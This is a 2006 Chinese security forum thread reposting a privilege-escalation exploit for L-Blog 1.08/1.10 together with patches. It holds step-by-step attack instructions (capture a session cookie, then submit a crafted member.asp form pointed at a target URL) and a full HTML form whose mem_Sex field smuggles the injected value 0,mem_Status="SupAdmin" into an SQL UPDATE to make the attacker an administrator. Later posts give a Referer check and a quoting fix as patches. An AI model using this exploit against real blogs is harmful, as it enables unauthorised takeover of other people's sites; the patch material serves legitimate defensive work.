邪恶八进制信息安全团队技术讨论组 » 重要安全公告{ Security Advisory Bulletin } » 漏洞分析[ Vulnerability Analyse ] » [转载]L-BLOG最新提权漏洞利用程序与补丁

大大马甲 2006-1-10 00:49

[quote][b]引用第1楼[i]yezhan[/i]于[i]2006-01-10 05:47[/i]发表的“”[/b]:
没记错的话这个是lblog第二个跨站漏洞了```[/quote]
[s:57] 这个也叫跨站？奇怪了

unusual 2006-1-10 01:55

我也汗了跨站好象不是这么定义的吧?

yezhan 2006-1-10 05:40

[转载]L-BLOG最新提权漏洞利用程序与补丁

信息来源：[url]http://okhtm.com/article.asp?id=464[/url]


申明
[quote]
程序是 firefox出的,大家看图,自己过去下.漏洞文章是[url]http://blog.365hello.com/[/url]转的

补丁是im286的smnh发的 [/quote]

以下为我整理的:

打开目标Blog，注册一个ID，注册后会自动登陆；
登陆后进入“用户中心 - 修改资料”，此时要运行“WSockExpert”来抓取Cookie，在“编辑个人资料”处填入“旧密码”，其他的什么都不要填，直接点击“确定编辑”，这时“WSockExpert”已抓取到了Cookie，复制下来；
运行程序，填入该目标Blog的地址、刚才抓取到的Cookie以及你注册时的密码，点击“提交”，待状态栏提示“数据提交完毕，请重新登陆！”后，重新登陆Blog，你注册的ID即提升为管理员。

[img]http://okhtm.com/upload/200601/09_213354_20061842213654.jpg[/img]

漏洞还不只是限制在1.08~~L-Blog V1.10 AIO 版也一样可以搞定~~

member.asp文件

[quote]<html>
<head>
</head>
<body>
<table width="768" border="0" align="center" cellpadding="4" cellspacing="6" background="images/blog_main.gif">
<tr>
<td width="128" align="center"><strong>用户编辑</strong></td>
<td valign="top" align="center"><table width="95%" border="0" cellpadding="4" cellspacing="1" bgcolor="#CCCCCC">
<tr bgcolor="#EFEFEF">
<td colspan="2"><b>编辑个人资料</b></td>
</tr>
<tr bgcolor="#FFFFFF"><form action="[url]http://url/member.asp?action=edit&edit=post[/url]" method="post" name="Submit" id="Submit">
<td width="98" align="right" nowrap>名称：</td>
<td width="100%"> 9xiao</td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right" nowrap>旧密码：</td>
<td> <input name="mem_OldPassword" type="password" id="mem_OldPassword" size="16">
<span class="htd"><b><font color="#FF0000"> *</font></b> 修改资料必须输入原密码</span></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right" nowrap>新密码：</td>
<td> <input name="mem_NewPassword" type="password" id="mem_NewPassword" size="16">
<span class="htd"><b><font color="#FF0000">*</font></b> 密码必须是6-16位</span></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right" nowrap>确认密码：</td>
<td> <input name="mem_RePassword" type="password" id="mem_RePassword" size="16"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right" nowrap>性别：</td>
<td><input name="mem_Sex" type="text" size="36" value=0,mem_Status="SupAdmin" ></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right" nowrap>邮箱：</td>
<td> <input name="mem_Email" type="text" id="mem_Email" value="pyadong at 263 dot net" size="30">
  
<input name="mem_HideEmail" type="checkbox" id="mem_HideEmail" value="1" >
隐藏邮箱</td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right" nowrap>腾讯QQ：</td>
<td> <input name="mem_QQ" type="text" id="mem_QQ" value=""></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right" nowrap>个人主页：</td>
<td> <input name="mem_HomePage" type="text" id="mem_HomePage" value="" size="35"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right" nowrap>个人简介：</td>
<td> <textarea name="mem_Intro" cols="50" rows="5" wrap="VIRTUAL" id="mem_Intro"></textarea></td>
</tr>
<tr align="center" bgcolor="#FFFFFF">
<td colspan="2">
<input type="submit" name="Submit" value=" 确定编辑 ">
</td>
</tr></form>
</table></td>
</tr>
</table></body>
</html>

action="[url]http://url/member.asp?action=edit&edit=post[/url]" 替换为目标url，1.10版本抓包修改mem_Sex值为“0,mem_Status="SupAdmin"”
[/quote]

补丁程序:

[quote]member.asp文件

<!--#include file="commond.asp" -->
<!--#include file="include/function.asp" -->
<!--#include file="include/md5code.asp" -->
<!--#include file="include/ubbcode.asp" -->
<!--#include file="header.asp" -->
&#39;在这里添加上下面部分
&#39;====================

<%
dim server_v1,server_v2
server_v1=Cstr(Request.ServerVariables("HTTP_REFERER"))
server_v2=Cstr(Request.ServerVariables("SERVER_NAME"))
if mid(server_v1,8,len(server_v2))<>server_v2 then
response.write "<meta http-equiv=Content-Type content=""text/html; charset=utf-8"" /><center><div align=""center"" style=""width:400px;height:100px;padding: 8px;font-size:9pt;border: 1px solid ThreeDShadow;POSITION:absolute;top:expression((document.body.offsetHeight-100)/2);left:expression((document.body.offsetWidth-400)/2);""><table width=""100%"" height=""100%"" style=""font-size:12px;""><tr><td align=""center"">你提交的路径有误，禁止从站点外部提交数据请不要乱该参数！</td></tr></table></div>"
response.end
end if
%>

&#39;====================
完毕
<%IF Request.QueryString("action")="edit" AND memName<>Empty Then%>
[/quote]

[b]不想说什么了,又是跨站.大家做asp程序需要注意一下了. [/b]

yezhan 2006-1-10 05:47

没记错的话这个是lblog第二个跨站漏洞了```

smnh 2006-1-11 15:39

最根本的补丁

member.asp
找到这段



[quote]Conn.ExeCute("UPDATE blog_Member SET mem_Sex="&CheckStr(Request.Form("mem_Sex"))&",mem_Email=&#39;"&CheckStr(Request.Form("mem_Email"))&"&#39;,mem_HideEmail="&mem_HideEmail&",mem_QQ=&#39;"&CheckStr(Request.Form("mem_QQ"))&"&#39;,mem_HomePage=&#39;"&CheckStr(Request.Form("mem_HomePage"))&"&#39;,mem_Intro=&#39;"&CheckStr(Request.Form("mem_Intro"))&"&#39;"&SQL_Add&" WHERE mem_Name=&#39;"&memName&"&#39;")[/quote]将



[quote]mem_Sex="&CheckStr(Request.Form("mem_Sex"))&",[/quote]修改为



[quote]mem_Sex=&#39;"&CheckStr(Request.Form("mem_Sex"))&"&#39;,[/quote]

yezhan 2006-1-11 21:14

挖靠````

刚想起来自己说错了```

是站外提交

查看完整版本: [转载]L-BLOG最新提权漏洞利用程序与补丁

© 1999-2008 EvilOctal Security Team